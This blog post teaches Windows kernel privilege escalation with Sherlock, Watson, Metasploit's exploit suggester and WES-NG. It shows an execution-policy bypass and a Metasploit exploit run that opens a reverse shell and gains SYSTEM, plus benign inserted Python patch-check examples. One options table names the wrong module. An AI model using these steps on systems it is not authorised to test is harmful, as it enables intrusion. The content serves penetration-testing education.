Windows Kernel Exploitation

There are several tools out there to check whether there are known exploits against an unpatched Windows kernel. The most notable are discussed below, one per section:

Each of these has their pros and cons. I will discuss them one by one and what they may be useful for:

Sherlock

Sherlock is a tool that was created by a user that goes by rasta-mouse. The project can be found here. The program only checks against some older known exploits, so this script may be useful against older Windows machines, or some CTF boxes. Currently the script checks for these exploits:

  • MS10-015 : User Mode to Ring (KiTrap0D)
  • MS10-092 : Task Scheduler
  • MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
  • MS13-081 : TrackPopupMenuEx Win32k NULL Page
  • MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
  • MS15-051 : ClientCopyImage Win32k
  • MS15-078 : Font Driver Buffer Overflow
  • MS16-016 : 'mrxdav.sys' WebDAV
  • MS16-032 : Secondary Logon Handle
  • MS16-034 : Windows Kernel-Mode Drivers EoP
  • MS16-135 : Win32k Elevation of Privilege
  • CVE-2017-7199 : Nessus Agent 6.6.2-6.10.3 Priv Esc

To run the script, we can run the commands below:

c:\> powershell -ep bypass
c:\> Import-Module .\Sherlock.ps1
c:\> Find-AllVulns
...snip...
Title : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID : 2014-4113
Link : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable
...snip...

The script will check against all the known vulnerabilities. If you would like to manually exploit something that looks vulnerable, you can navigate here to get a list of pre-compiled exploits for these kernel versions. A lot of the time, the exploits will link you to an exploit on Exploit-DB that you can download and compile yourself.
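To make concrete what a check of this kind does (Sherlock reads the file version of a system binary and compares it with the build in which the fix shipped), here is an added Python example. It is not code from Sherlock, Watson or this post, and every binary name, bulletin label and version number in it is a constructed placeholder rather than a real fixed build; on a real host the version strings would come from the files' version resources (for instance `(Get-Item C:\Windows\System32\win32k.sys).VersionInfo.FileVersion` in PowerShell). The example also shows why the comparison has to be numeric per component: compared as strings, a revision of 9999 looks newer than 18000.

```python
"""Patch-level check by file version, in the style of Sherlock-type scripts.

Added illustration, not code from Sherlock, Watson or this post. Every
version number, binary name and bulletin label below is a constructed
placeholder, not a real fixed build.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int, int]


def parse_version(text: str) -> Optional[Version]:
    """Parse 'major.minor.build.revision' into four ints; None if malformed.

    Comparing as ints matters: as strings, '6.1.7601.9999' sorts after
    '6.1.7601.18000', but revision 9999 is the older file.
    """
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        return None
    major, minor, build, revision = (int(p) for p in parts)
    return (major, minor, build, revision)


@dataclass(frozen=True)
class FixRecord:
    """One bulletin: which binary, which OS build, first fixed revision."""
    bulletin: str
    binary: str
    build: int
    fixed_revision: int


def check(installed: Dict[str, str], fixes: List[FixRecord]) -> Dict[str, str]:
    """Classify each bulletin against the observed file versions.

    installed maps binary name -> version string read from the file.
    """
    result: Dict[str, str] = {}
    for fix in fixes:
        raw = installed.get(fix.binary)
        ver = parse_version(raw) if raw is not None else None
        if ver is None:
            result[fix.bulletin] = "Unknown"             # file missing or unparsable
        elif ver[2] != fix.build:
            result[fix.bulletin] = "Not Applicable"      # record is for another OS build
        elif ver[3] < fix.fixed_revision:
            result[fix.bulletin] = "Appears Vulnerable"  # older than the fixing revision
        else:
            result[fix.bulletin] = "Not Vulnerable"
    return result


# Constructed sample input: versions as a PowerShell one-liner might report them.
SAMPLE_VERSIONS = {
    "win32k.sys": "6.1.7601.18700",
    "ntoskrnl.exe": "6.1.7601.17514",
    "mrxdav.sys": "not a version",
}

# Constructed fix table; the numbers are placeholders, not real bulletins.
SAMPLE_FIXES = [
    FixRecord("EXAMPLE-A", "win32k.sys", 7601, 18800),
    FixRecord("EXAMPLE-B", "ntoskrnl.exe", 7601, 17000),
    FixRecord("EXAMPLE-C", "ntoskrnl.exe", 9600, 100),
    FixRecord("EXAMPLE-D", "mrxdav.sys", 7601, 1),
]


def report(installed: Dict[str, str], fixes: List[FixRecord]) -> List[str]:
    """Render Sherlock-like output lines, vulnerable findings first."""
    status = check(installed, fixes)
    order = {"Appears Vulnerable": 0, "Unknown": 1, "Not Vulnerable": 2, "Not Applicable": 3}
    return [f"{b} : {s}" for b, s in sorted(status.items(), key=lambda kv: (order[kv[1]], kv[0]))]


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_VERSIONS, SAMPLE_FIXES)))
```

The "Unknown" and "Not Applicable" outcomes are worth keeping separate from "Not Vulnerable": a missing or unreadable file tells you nothing about patch level, and a record for another OS build must not be counted either way.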

Watson

Watson is the upgraded and updated version of Sherlock. Sherlock is deprecated, but Watson is updated monthly by rasta-mouse with new exploit checks. The pros of using Watson are that you get more accurate results and the project is updated frequently. Are there any cons? Kind of. Watson is harder to set up before you use it, because it is written in C# rather than PowerShell and has to be compiled specifically for the version of .NET present on the target Windows machine. I will explain how to do this:

First you will need to find out which version of .NET is installed on the target machine. The installed versions appear as directories under C:\windows\microsoft.net\framework\:

PS > C:\windows\microsoft.net\framework\
07/16/2016  09:23 AM    <DIR>          v1.0.3705
07/16/2016  09:23 AM    <DIR>          v1.1.4322
06/04/2018  02:07 PM    <DIR>          v2.0.50727
06/04/2018  02:07 PM    <DIR>          v3.0
06/04/2018  02:07 PM    <DIR>          v3.5
04/13/2019  10:44 AM    <DIR>          v4.0.30319

In this example, the target machine is using .NET version 4.0.

Next you will need to download the project from the Watson Github Page. The next steps need to be done on a Windows machine or a Windows VM using Visual Studio.

In Visual Studio, you will have the option to open a project folder. Select the entire folder. Next, on the right-hand side you will see a file called watson.sln. Double-click it to open the project. Now right-click the Watson project (step 1 in the image) and select Properties (step 2 in the image). Under "Application" (step 3), set the target framework to the version you need, which is version 4.0 in our case.

We can now build the program which should be called Watson.exe. The .exe file will be found in the bin folder. This can now be copied over to the target machine and executed:

C:\> .\Watson.exe
...snip...
[*] Appears vulnerable to MS13-005
[>] Description: Due to a problem with isolating window broadcast messages in the Windows kernel, an attacker can broadcast commands from a lower Integrity Level process to a higher Integrity Level process, thereby effecting a privilege escalation.
[>] Exploit: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
[>] Notes: None.
...snip...

Watson will also provide suggested exploits and the links to them. You can navigate to these exploits and compile them for the machine. You can also find a list of pre-compiled exploits here.

Metasploit

With Metasploit, you should already have a Meterpreter shell open for this to work. The tools we are going to use are post-exploitation modules, which means they are run after getting your initial foothold on the machine.

The module we will be using is post/multi/recon/local_exploit_suggester

To run this module, we can run the command below assuming we already have a Meterpreter shell:

Meterpreter> run post/multi/recon/local_exploit_suggester SHOWDESCRIPTION=true
[*] Collecting local exploits for x86/windows...
[*] 28 exploit checks are being tried...
...snip...
[*] exploit/windows/local/ms13_081_track_popup_menu: The target is vulnerable
...snip...

After we have a list of possible exploits, we can search Exploit-DB for an exploit and compile it, check this list of pre-compiled exploits for Windows, or use the suggested Metasploit module. In the example above it gives us the exploit/windows/local/ms13_081_track_popup_menu module. To exploit this vulnerability, we can run these commands:

Metasploit> use exploit/windows/local/ms13_081_track_popup_menu
msf exploit(windows/local/ms13_081_track_popup_menu) > options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION   1                yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)

msf exploit(windows/local/ms13_081_track_popup_menu) > run
[*] Started reverse TCP handler on 10.10.10.99:443
...snip...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Windows Exploit Suggester — Next Generation

Windows Exploit Suggester — Next Generation (WES-NG) uses the output of systeminfo to determine which vulnerabilities the OS is exposed to. The project is updated frequently by the developer. The pros are that it is easy to use and updated frequently; the con is that you must have Python installed on the target Windows machine, which Windows does not ship by default, so this could be a problem. First you will need to download a copy of the tool from here. The next steps are outlined well on the documentation page, so I will copy them word for word here:

  1. Obtain the latest database of vulnerabilities by executing the command wes.py --update.
  2. Use Windows’ built-in systeminfo.exe tool to obtain the system information of the local system, or from a remote system using systeminfo.exe /S MyRemoteHost, and redirect this to a file: systeminfo > systeminfo.txt
  3. Execute WES-NG with the systeminfo.txt output file as the parameter: wes.py systeminfo.txt. WES-NG then uses the database to determine which patches are applicable to the system and to which vulnerabilities are currently exposed, including exploits if available.
  4. As the data provided by Microsoft is frequently incomplete and false positives are reported by wes.py, make sure to check the Eliminating false positives page at the Wiki on how to deal with this. For an overview of all available parameters, check CMDLINE.md.

After the program has run, it will display a list of exploits and the link to the exploit. You can navigate to the page to download and compile the exploit yourself, or you can search here for a list of pre-compiled exploits that you can use.
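Steps 2 and 3 above boil down to parsing the systeminfo output and matching the installed hotfix list against a table of fixing KBs, with supersedence taken into account (a later cumulative update replaces an earlier KB, which is also where many of the false positives mentioned in step 4 come from). Here is an added Python example of that logic; it is not WES-NG's own code, and the systeminfo text, KB numbers, bulletin labels and supersedence map are all constructed placeholders, not real data.

```python
"""Hotfix-based exposure check from systeminfo output, in the style of WES-NG.

Added illustration, not WES-NG's code. The systeminfo text, KB numbers,
bulletin labels and supersedence map are constructed placeholders.
"""
import re
from typing import Dict, List, Set

# Constructed stand-in for what `systeminfo > systeminfo.txt` produces.
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-PC
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000101
                           [02]: KB0000301
                           [03]: KB0000401
"""

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
BUILD_RE = re.compile(r"Build\s+(\d+)")


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract the OS version string, numeric build and set of installed KBs."""
    info: Dict[str, object] = {"os_version": "", "build": None, "hotfixes": set()}
    for line in text.splitlines():
        m = HOTFIX_RE.search(line)
        if m:                                   # continuation line under Hotfix(s):
            info["hotfixes"].add(m.group(1).upper())
            continue
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "os version":
            info["os_version"] = value.strip()
            b = BUILD_RE.search(value)
            if b:
                info["build"] = int(b.group(1))
    return info


# Constructed table: bulletin -> OS builds it applies to and KBs that fix it.
FIXES = {
    "EXAMPLE-A": {"builds": {7601}, "kbs": {"KB0000101"}},  # fixing KB installed directly
    "EXAMPLE-B": {"builds": {7601}, "kbs": {"KB0000201"}},  # covered by a superseding KB
    "EXAMPLE-C": {"builds": {7601}, "kbs": {"KB0000501"}},  # nothing installed for it
    "EXAMPLE-D": {"builds": {9600}, "kbs": {"KB0000601"}},  # different build, not applicable
}
# Constructed supersedence: KB0000301 replaces (contains) KB0000201.
SUPERSEDED_BY = {"KB0000201": "KB0000301"}


def satisfied(kb: str, installed: Set[str], superseded_by: Dict[str, str]) -> bool:
    """True if kb, or any KB that transitively supersedes it, is installed."""
    seen: Set[str] = set()
    cur = kb
    while cur and cur not in seen:            # seen-set guards against cyclic data
        if cur in installed:
            return True
        seen.add(cur)
        cur = superseded_by.get(cur, "")
    return False


def exposure(info: Dict[str, object], fixes: Dict[str, dict],
             superseded_by: Dict[str, str]) -> Dict[str, str]:
    """Classify every bulletin as Patched, Exposed or Not Applicable."""
    installed: Set[str] = info["hotfixes"]  # type: ignore[assignment]
    out: Dict[str, str] = {}
    for bulletin, rec in fixes.items():
        if info["build"] not in rec["builds"]:
            out[bulletin] = "Not Applicable"
        elif any(satisfied(kb, installed, superseded_by) for kb in rec["kbs"]):
            out[bulletin] = "Patched"
        else:
            out[bulletin] = "Exposed"
    return out


def exposed_bulletins(text: str) -> List[str]:
    """Convenience entry point: systeminfo text in, sorted list of exposed bulletins out."""
    result = exposure(parse_systeminfo(text), FIXES, SUPERSEDED_BY)
    return sorted(b for b, s in result.items() if s == "Exposed")


if __name__ == "__main__":
    for bulletin, status in exposure(parse_systeminfo(SAMPLE_SYSTEMINFO), FIXES, SUPERSEDED_BY).items():
        print(f"{bulletin}: {status}")
```

Without the supersedence walk, EXAMPLE-B would be reported as exposed even though the installed KB0000301 contains that fix; an incomplete supersedence map is exactly the kind of gap that produces the false positives the WES-NG wiki page deals with, so a finding should be confirmed against the actual file version before being acted on.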

I hope this post was useful. We went over several ways on how to search for Windows kernel vulnerabilities and how to exploit them. While one tool may work amazing for one situation, it may not work as well for a different situation. It never hurts to know how to do something more than one way.

Recipe For Root

I am a Security Consultant and formerly worked at PayPal as a Penetration Tester. At night I teach Cyber Security at UTexas. OSCP